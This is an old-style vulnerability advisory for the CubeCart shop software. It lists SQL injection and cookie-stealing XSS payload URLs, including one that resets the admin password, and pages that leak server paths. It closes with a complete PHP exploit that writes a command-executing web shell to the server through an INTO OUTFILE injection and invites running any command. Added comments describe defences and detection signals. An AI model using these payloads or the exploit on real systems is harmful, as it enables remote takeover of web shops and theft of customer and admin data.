
CubeCart Multiple input Validation vulnerabilities



Hello,

CubeCart Multiple input Validation vulnerabilities

Discovered By : HACKERS PAL
Copy rights : HACKERS PAL
Website : http://www.soqor.net
Email Address : security@xxxxxxxxx


SQL injection


admin/forgot_pass.php?submit=1&user_name=-1'or%201=1/*
This resets the administrator's password.
--

admin/forgot_pass.php?submit=1&user_name=-1'%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42/*
--
view_order.php?order_id='%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30/*
--
view_doc.php?view_doc=-1'%20union%20select%201,2/*
--
admin/print_order.php?order_id='%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30/*
/***************************************/
XSS
admin/print_order.php?order_id=<script>alert(document.cookie);</script>
--
view_order.php?order_id=<script>alert(document.cookie);</script>
--
admin/nav.php?site_url="><script>alert(document.cookie);</script><noscript>
admin/nav.php?la_search_home=<script>alert(document.cookie);</script>
and the language variables used by this file.
--
admin/image.php?image=<script>alert(document.cookie);</script>
--
admin/header.inc.php?site_name=</title><script>alert(document.cookie);</script>
admin/header.inc.php?la_adm_header=</title><script>alert(document.cookie);</script>
admin/header.inc.php?charset='><script>alert(document.cookie);</script>
and all other variables in this file
--
footer.inc.php?la_pow_by=<script>alert(document.cookie);</script>
--
header.inc.php?site_name=</title><script>alert(document.cookie);</script>
and all other variables in the file.
--
/***************************************/

Full path disclosure

information.php
language.php
link_navi.php?cat_id=1
list_docs.php
popular_prod.php
sale.php
check_sum.php
spotlight.php
cat_navi.php

/***************************************/

Exploit:

#!/usr/bin/php -q -d short_open_tag=on
<?
/*
/* CubeCart Remote sql injection exploit
/*            By : HACKERS PAL
/*             WwW.SoQoR.NeT
/*
/* Tested on CubeCart 2.0.X; other versions may also be affected
*/
// Banner. print_r() on a plain string simply echoes it.
print_r('
/**********************************************/
/*   CubeCart Remote sql injection exploit    */
/*     by HACKERS PAL <security@xxxxxxxxx>    */
/*         site: http://www.soqor.net         */');
// One positional argument is required: the base URL of the installation.
// Without it, print the usage block and exit.
if ($argc<2) {
print_r('
/* --                                         */
/* Usage: php '.$argv[0].' host
/* Example:                                   */
/*  php '.$argv[0].' http://localhost/CubeCart/
/**********************************************/
');
die;
}
// All PHP notices/warnings are suppressed. get_page() below does no error
// checking of its own, so a failed fetch is silent and the script falls
// through to its final "[-]" branch.
error_reporting(0);
// No script time limit; each remote fetch gives up after 5 seconds.
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);

$url=$argv[1];
// First request target: cat_navi.php is one of the pages listed under
// "Full path" in the advisory above, i.e. it leaks its filesystem path.
$exploit1="/cat_navi.php";
         /**
          * Fetch the raw body of $url and return it as a string.
          *
          * Uses file_get_contents() when available; otherwise falls back to an
          * fopen()/fread() loop for very old PHP builds. No error handling: on
          * the primary path a failed fetch yields false, on the fallback path
          * it yields null/empty, and no exception is ever thrown.
          */
         function get_page($url)
         {
                   if (!function_exists("file_get_contents")) {
                       $handle = fopen("$url", "r");
                       $body = null;
                       while ($chunk = fread($handle, 1024)) {
                           $body .= $chunk;
                       }
                       return $body;
                   }

                   return file_get_contents($url);
         }

     // Step 1: fetch cat_navi.php and scrape the filesystem path it discloses.
     // The response is split on "<b>"; the third segment, cut at "</b>", is
     // taken as the path. That layout looks like the HTML form of a PHP
     // warning ("<b>Warning</b>: ... in <b>/path/cat_navi.php</b> ...") —
     // presumably; the page itself is not shown here. Defender note: with
     // display_errors off in production there is nothing to scrape, and the
     // OUTFILE target in step 2 cannot be derived from the page.
     $page = get_page($url.$exploit1);

             $pa=explode("<b>",$page);
             $pa=explode("</b>",$pa[2]);
             // Replace the script name with the file the exploit wants written.
             $path = str_replace("cat_navi.php","",$pa[0])."soqor.php";
             // Build a lone backslash indirectly ('\ ' minus the space) so the
             // literal is not read as an escape, then normalise Windows
             // separators to '/'.
             $var='\ ';
             $var  = str_replace(" ","",$var);
             $path = str_replace($var,"/",$path);
             
// Step 2: the view_doc.php injection from the advisory, with the UNION payload
// replaced by a two-column SELECT ... INTO OUTFILE that asks MySQL to write a
// PHP file at the scraped path. Defender note: MySQL honours INTO OUTFILE only
// for accounts holding the FILE privilege, and the file is written by the
// mysqld process, so this additionally needs a web root that process can
// write to. A parameterised query in view_doc.php, a DB account without FILE,
// or a web root the DB server cannot write to — any one of these defeats
// this step.
$exploit2="/view_doc.php?view_doc=-1'%20union%20select%20'<?php%20system(".'$_GET[cmd]'.");%20?>','WwW.SoQoR.NeT'%20INTO%20OUTFILE%20'$path'%20from%20store_docs/*";
     $page_now = get_page($url.$exploit2);
     // Success check: the response must contain the text "mysql_fetch_array()",
     // i.e. a verbose MySQL error reached the client (presumably because a
     // SELECT ... INTO OUTFILE returns no result set for the page to iterate).
     // Detection: a request to view_doc.php whose query string contains
     // "union select" or "INTO OUTFILE", or a response carrying mysql_* error
     // text, is a strong log/WAF signal for this attack.
     if(ereg("mysql_fetch_array()",$page_now))
     {
          $newurl=$url."/soqor.php?cmd=id";
          Echo "\n[+] Go TO ".str_replace("//","/",$newurl)."\n[+] Change id to 
any command you want :)";
     }
     else
     {
          Echo "\n[-] Exploit Faild";
     }
     Die("\n/* Visit us : WwW.SoQoR.NeT                   
*/\n/**********************************************/");

?>

#WwW.SoQoR.NeT